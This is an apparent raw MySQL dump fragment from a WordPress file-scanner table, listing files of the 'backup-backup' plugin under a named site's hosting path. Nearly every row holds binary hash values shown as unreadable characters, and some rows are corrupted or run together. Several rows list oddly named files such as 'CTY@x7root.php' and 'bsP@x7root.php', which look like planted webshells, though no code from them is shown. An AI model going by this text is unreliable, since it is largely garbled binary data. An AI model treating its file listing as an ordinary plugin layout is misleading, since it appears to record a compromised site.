PK|8q','',0,'?'),('%\nTćl26','wp-content/plugins/backup-backup/analyst/src/helpers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3P\n#WE','mfer?qSC:=','',0,'?'),('ǰA޸V)Oo','wp-content/plugins/backup-backup/analyst/templates/forms/deactivate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/forms/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}oZCM\rBI','MoL%`gkr<\0{J,Q','',0,'?'),('\roj.\0}','wp-content/plugins/backup-backup/analyst/templates/forms/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/forms/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.k]e','|I *yoIܿyc^$','',0,'?'),('HQ$g','wp-content/plugins/backup-backup/analyst/templates/notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X0.\\R','+cȤ@Ӷr\ZSpmG޵^','',0,'?'),(']b׆ZÉվ','wp-content/plugins/backup-backup/analyst/templates/optin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/optin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cZsݕL}','}3;2r9w_}!(S\Z=;\"^#f','',0,'?'),('v\nj =\ZQ','wp-content/plugins/backup-backup/analyst/templates/optout.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/optout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+X8V03','@|7veӕ1GzG_WwzN\0','',0,'?'),(':,̒B & \0a','wp-content/plugins/backup-backup/analyst/version.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$lҘP?ס','ckSav\0KbnzyveѨ6N','',0,'?'),('RUgQܰWN^nP','wp-content/plugins/backup-backup/backup-backup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/backup-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z-XYtt','.+<\r%On<\ZhN.b9B5W','',0,'?'),('(֫j,p','wp-content/plugins/backup-backup/includes/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t%mvXMIr','bHsmcqvL:~48w\n ~Qt','',0,'?'),('\0lM?;%','wp-content/plugins/backup-backup/includes/2797806595...php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/2797806595...php',0,'18R!\\٠','18R!\\٠','7f+ɘGFj\Z/5g[վfX\06w','',0,'?'),('T,yf{C+c','wp-content/plugins/backup-backup/includes/3688038378...php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/3688038378...php',0,'18R!\\٠','18R!\\٠','7f+ɘGFj\Z/5g[վfX\06w','',0,'?'),('kN5','wp-content/plugins/backup-backup/includes/CTY@x7root.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/CTY@x7root.php',0,'> {f','> {f','ě~ \rbԣM','',0,'?'),('M 7pw_3','wp-content/plugins/backup-backup/includes/Mzc@x7root.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/Mzc@x7root.php',0,'> {f','> {f','ě~ \rbԣM','',0,'?'),('?nҠɠ\0O','wp-content/plugins/backup-backup/includes/activation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sFaYէ\r2[','hM/Kl$;#ޗ:#&N','',0,'?'),('3X$hyk:','wp-content/plugins/backup-backup/includes/ajax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BJ\01vuj',', 8UI*n8s\n4 gD \nSZ','',0,'?'),('PU9sX#C','wp-content/plugins/backup-backup/includes/analyst.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/analyst.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӊ~G9\Zw+','=^tRb\05 _7lej#','',0,'?'),('\ni.KxEr>','wp-content/plugins/backup-backup/includes/backup-cli.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WJ=<ᐷY/B','T\'Ճ ;)\' \'X-vO','',0,'?'),('uJF^i@E;','wp-content/plugins/backup-backup/includes/backup-heart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S_׫f','Z grc*y-hx4c3͵','',0,'?'),('[X\\-ޏ8RO','wp-content/plugins/backup-backup/includes/banner/assets/index.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/assets/index.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\"=#f','-zSdgTJ~)\0ͯp|]','',0,'?'),('2㿰K? ]Buĸ','wp-content/plugins/backup-backup/includes/banner/assets/style.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/assets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M \0\"|Dq',':4#LKoʒͮE','',0,'?'),('M.,Bc55#ucw','wp-content/plugins/backup-backup/includes/banner/misc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RD9ܜZ@uF5','C0Uđi%zS H9}?;','',0,'?'),('%b )$҅\"','wp-content/plugins/backup-backup/includes/banner/views/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/6Qbh|2/l','C o\0X.(SQ]SŨAߨe\Z','',0,'?'),('Qh~lW2 |','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-images.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-images.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o;=yC_6','?rncEM9>Z3y\\Qk36','',0,'?'),('(&39Hm\Z','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-texture-grey.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-texture-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.¸f2','\'lrlSl:u6xQ','',0,'?'),('X#mFCm{WZ','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SߕtY!S','s҅\n8)lic$%b','',0,'?'),('Oo*8?x','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uGm\"\"]','AcPo69\'Ey0','',0,'?'),('˝ feXWN','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z?vFȜᛐɄǀ02\\s?ee \0d','',0,'?'),(' T}\'xՋ','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 4.]1`','v÷$F>dTf dp,JTC','',0,'?'),(':|5)J','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nKE#u\rg`]','-썈z ^\r;','Pʫ0pRo&P/_):vP','',0,'?'),('AY/4\rR,aE','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face1.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD]^\rH$o','XsfFر4 vk','',0,'?'),('Ls=RM.','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face2.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A^@//j/Ӡ','R; ax,\rG r?6tbp','',0,'?'),('U8xYira','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face3.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-f:^gwlO','R(\":QCZ9kK<e','',0,'?'),('o-n%7\\ԧ','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face4.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2QT60w',' ++^* uHF PN1Wmڴ','',0,'?'),('\\_gGKj\nK','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Q0yQJcJ','Z.;gzCeQ$pOt','',0,'?'),('3_Ǭ\Z*˓0','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q3~v@c','BI7пɫigPپZRdg|','',0,'?'),('G[|E3n','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-images.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-images.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bOs_df?u3','6=7j.4|?-ģ0R','',0,'?'),('w :|RZb89i','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-green.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\'J.Z','(c%ufR ZRëE','',0,'?'),('eIJVw :','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-grey.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bo.ŸKMSr\n','\'ArơE\n\r9[0\0*\0R-','',0,'?'),('\ZL{','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H ߙrO','P2Ysg\0 %ڬl܎1LX','',0,'?'),('V pvsC„','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O S\'7N','C펵ȑqx効g\"dV9','',0,'?'),('. .[z1/Gπ%Թ#8ph6Vh+','',0,'?'),('PM.n/۳','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'1ا}`![','ZR\Z8Wt~U5&`kl','',0,'?'),('2<^~Ȑ5ŔL','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/background-top-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/background-top-left.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2ZV\'LZ,y','\0|I\n,\\B0t$','',0,'?'),('spѿ7y\\`','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/big-colored-logo-rr.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/big-colored-logo-rr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~6-Uv8','B)$olj`;Xo^','',0,'?'),('a)ZbrH-\ru޴','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/not-colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/not-colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','98\Zn%\rlL','y\"`u1YܞhB`G','',0,'?'),('[{yX2jS','wp-content/plugins/backup-backup/includes/banner/views/projects/red/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gʏ|2=?@s','7Qû9?uF\\Pբ \r)׊CR','',0,'?'),('f(\0䀢B|','wp-content/plugins/backup-backup/includes/banner/views/projects/red/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' $GtU.\\:','S t\rѸ+!0x','',0,'?'),('oєԏ:冀x','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bɅ$ S\0^','^=|g)0&Qn J\'','',0,'?'),('`&O05XQx','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jjBMh4[','nL˸&|=IN2t\nW*qk','',0,'?'),(' >[qխ','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',LI\'@P','>v%]7sCgKoeШ/e','',0,'?'),('ͶbU8','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o؞ ZC羧IfH','a,2%2>NJ}:-','',0,'?'),('6q`7l','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nqksX~%','ʎF![+˟.8CUU ','',0,'?'),('Ӭ_RDL|؞\nu_N','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7oa;>\0kG','OgO[?ͽJfh>t@5jjrW','',0,'?'),('PobDqᘈ]','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c#Z6UB\"<\'','ge/``ɘ\r\\x+{LBY','',0,'?'),('Bi\r,Zψq~\n','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-icons.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|#3>}T','ۤCSHW7+z28_E`gn','',0,'?'),('b2]/9FI','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\"Sygp;爷Yx','',0,'?'),('Ʌ%x3P','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/play-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/play-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' `=DnՔ ','\r?\rJ|.t;O|','',0,'?'),('\nkgn]Ŏz','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/ribbon-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/ribbon-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ 4A>Jt#C','VS4qù:U^tnFGWmkSjJ','',0,'?'),('h%p;EM','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/video-background.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/video-background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NIx>\'KNh7$t','ŋ=^3hk;p^%im','',0,'?'),('(@S','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&8<2:I','#eKOqA>~ p 4e &\0t','',0,'?'),('W\Zn5+(1','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z2jذRa','sĘn\ZzHFv1Fh:Jz','',0,'?'),('SXh\"2>','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*b4ixT^','fmW(-5HzĕB^nغ','',0,'?'),('ĺ*~`{','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C81͹̛','\rGYHגArfL1XW','',0,'?'),('*(K=','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','،!nK','LԗwbKPVuma ݿm\ZGZ','',0,'?'),('tcDds4ِ','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZzU]','œl3+ޏr#m<(8\"Mz9G','',0,'?'),('[R:w','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/already-installed.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/already-installed.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' `EZ Zs','K:~LrDBW/\"-*','',0,'?'),('gIz4} ','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/check-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/check-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!k*N','f+7zjͱ]i+>Ӎv','',0,'?'),('ODbE6}','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/clock-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/clock-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L;VI8 ̻WQl','\Z`;WĪKG4HF\n;','',0,'?'),('a[}sNUo&S','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/rating.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/rating.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z}&.~Wj','<]5D\'ΏS2\'[>','',0,'?'),('4..\\)Ef','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/white-arrow-right.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/white-arrow-right.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6狺^$|','_>h_P߁AB]Eӱ_','',0,'?'),('gс ó','wp-content/plugins/backup-backup/includes/banner/views/static/tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߞX[#a','#\Z\"AʧM,LC gѼ^m','',0,'?'),('f\0FyF','wp-content/plugins/backup-backup/includes/bsP@x7root.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/bsP@x7root.php',0,'> {f','> {f','ě~ \rbԣM','',0,'?'),('@K t?','wp-content/plugins/backup-backup/includes/bypasser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/bypasser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'cF4SR#&','۱ <*|O!Ha*(zH','',0,'?'),('<}Ga4ES','wp-content/plugins/backup-backup/includes/check/checker.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/check/checker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H͇F;0+e%f k+','3\rE21u6kp','',0,'?'),('jdۢ㡆bټ>ۦ','wp-content/plugins/backup-backup/includes/check/system_info.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/check/system_info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jd`Y4t5 ','9 YeŚS.\\+ծɒjV19','',0,'?'),('YNR M','wp-content/plugins/backup-backup/includes/cli/php_cli_finder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli/php_cli_finder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':xvxb^/m','h3!h7Ϝ݄rҺ7','',0,'?'),('# mi rME','wp-content/plugins/backup-backup/includes/cli/version_check.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli/version_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6]/4C\Z8ٵ>$','\"TOB}4yr*,ecv`Rz','',0,'?'),('Ї΍Z$6\rMы_','wp-content/plugins/backup-backup/includes/cli-handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\"S>j','UD#T)^eZ,oR','',0,'?'),('4ûmuBv|','wp-content/plugins/backup-backup/includes/compatibility.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@~i6f','1#`\\~]Zl\"=z(','',0,'?'),('095$s,Q$','wp-content/plugins/backup-backup/includes/config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x^\"I4% Pm ','|>Ep\'%͓wʰ>F','',0,'?'),('` B\0yo4','wp-content/plugins/backup-backup/includes/constants.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GeU\'?D','kfuh\rw&0MR#e;','',0,'?'),('\0<ø#\r','wp-content/plugins/backup-backup/includes/cron/handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cron/handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{.ԱR5,','~kX8}~_{oz|V#','',0,'?'),('q B,\\!aD#b','wp-content/plugins/backup-backup/includes/dashboard/chapter/AA-Template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/AA-Template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ws%o;Y[','\ZMx`ļe \Z\'T.y8)','',0,'?'),('A IK3l8','wp-content/plugins/backup-backup/includes/dashboard/chapter/other_config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/other_config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٲ7m־єa','uLjV!eG9T4j','',0,'?'),('08DL0,','wp-content/plugins/backup-backup/includes/dashboard/chapter/save-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/save-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿa쏴1I3\\jp','C4|J,!#\0`rй\n','',0,'?'),('7)Jo','wp-content/plugins/backup-backup/includes/dashboard/chapter/staging.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/staging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M.U\0X.^x|',']v\"b0RGjB3u *7ة','',0,'?'),('4\n7','wp-content/plugins/backup-backup/includes/dashboard/chapter/store_config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/store_config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mj3Sx`{',' YR\Z~vuzf$ThtYv\06c','',0,'?'),('˃9]B','wp-content/plugins/backup-backup/includes/dashboard/chapter/troubleshooting.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/troubleshooting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MsB{֍*ritbq','Ҏ]j&Q>rȡ5^~ԅ','',0,'?'),('x\"aKͱoԖbt','wp-content/plugins/backup-backup/includes/dashboard/chapter/what_backed_up.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/what_backed_up.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D\0&DA%n',',\'@~—d)^޼=IpΛ','',0,'?'),(' !xa^tS1\0ч','wp-content/plugins/backup-backup/includes/dashboard/chapter/where_config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/where_config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hdIm#2UyD','ݙ\\dk=TRIՀv$r.3','',0,'?'),('?)S/UM','wp-content/plugins/backup-backup/includes/dashboard/modals/AA-Modal-Template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/AA-Modal-Template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|!6Ϸ6yMa','sGj.EO/I\\9','',0,'?'),('&[#`x3m','wp-content/plugins/backup-backup/includes/dashboard/modals/after-logs-sent.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/after-logs-sent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+͍]m kpX',' 6>i5TqY5芵ͻ','',0,'?'),('~ p 